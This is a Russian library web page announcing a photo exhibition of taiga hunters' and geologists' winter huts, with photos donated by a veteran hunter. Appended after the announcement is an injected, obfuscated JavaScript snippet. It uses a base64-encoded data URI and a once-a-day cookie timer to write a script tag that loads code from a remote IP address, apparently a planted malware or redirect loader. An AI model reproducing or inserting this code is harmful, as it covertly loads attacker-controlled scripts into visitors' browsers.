Фотовыставка «Таёжные жилища»

До сего времени на огромных просторах России коротают долгие зимние ночи в таёжных жилищах-зимовейках немногочисленные уже охотники-промысловики. В таких же, в каких жили их деды и прадеды. И не надо им роскошных апартаментов со всеми удобствами, потому что жизнь таёжная для них все равно, что для моряка море, а для летчика небо. Сколько труда надобно положить, чтобы построить и обустроить такую зимовейку, знает только тот, кто её строил.

А увидеть такие избушки вы можете на фотовыставке «Таёжные жилища охотников, геологов, путешественников», оформленной в Манской межпоселенческой библиотеке. Иные зимовейки существуют и поныне, иных уже давно нет, но осталась память и любовь к этим немудреным таёжным жилищам.

Фотографии предоставлены охотником-ветераном, почетным членом Ассоциации «Росохотрыболовсоюз», депутатом Шалинского сельсовета Н.П.Зайцевым.

Приглашаем всех ознакомиться с фотовыставкой, а если у вас есть интересные фотографии – приглашаем к сотрудничеству.

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}